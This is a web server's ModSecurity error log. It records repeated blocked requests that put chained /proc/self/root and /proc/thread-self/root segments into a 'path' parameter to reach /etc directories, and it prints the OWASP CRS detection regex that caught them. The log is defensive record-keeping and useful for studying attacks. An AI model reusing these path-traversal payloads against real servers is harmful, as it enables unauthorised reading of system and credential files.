[Mon Mar 16 11:03:01.430797 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:48550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNlZqj1wV0Si-OkefhGAAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:02.724790 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:48554] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNlhXjF1vJNtV6CWruPQAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:04.024692 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:48564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNmP9ocpUE4ed4uDzjgQAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:05.349428 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:48580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNmXjZBu2q05ozVU9LsAAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:06.699570 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:48588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNmv9ocpUE4ed4uDzjhAAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:07.900597 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:48596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNm7ABkC4fWIHEf8HiNAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:09.084959 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:48600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNnbysWC90G-1nBrA6ygAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:10.406031 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:49794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNno6lpbStxTqkSktjkwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:11.691453 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:49800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNn3jZBu2q05ozVU9LsQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:13.038818 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:49814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNoXjZBu2q05ozVU9LswAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:14.354759 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:49820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNoglT9VtDQc7bgUyj1gAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:15.534860 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:49830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNowlT9VtDQc7bgUyj2gAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:16.867361 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:49838] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNpP9ocpUE4ed4uDzjhwAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:20.529097 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:49852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNqBXjF1vJNtV6CWruTgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:32.105388 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:38812] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNtJqj1wV0Si-OkefhLgAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:03:32.506894 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.244.31:50666] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgNtLABkC4fWIHEf8HiOgAAAEs"]
[Mon Mar 16 11:03:43.945057 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:52538] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNv_9ocpUE4ed4uDzjnwAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:45.232520 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:48412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNwbysWC90G-1nBrA6zwAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:03:58.945394 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:48424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNzglT9VtDQc7bgUyj8AAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:04:33.808863 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.241.46:41024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgN8QlT9VtDQc7bgUykDgAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:04:40.639310 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.241.46:35004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgN-LysWC90G-1nBrA63wAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:04:50.099267 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.241.46:56210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgOAnbQATo66fKoS7xEbwAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
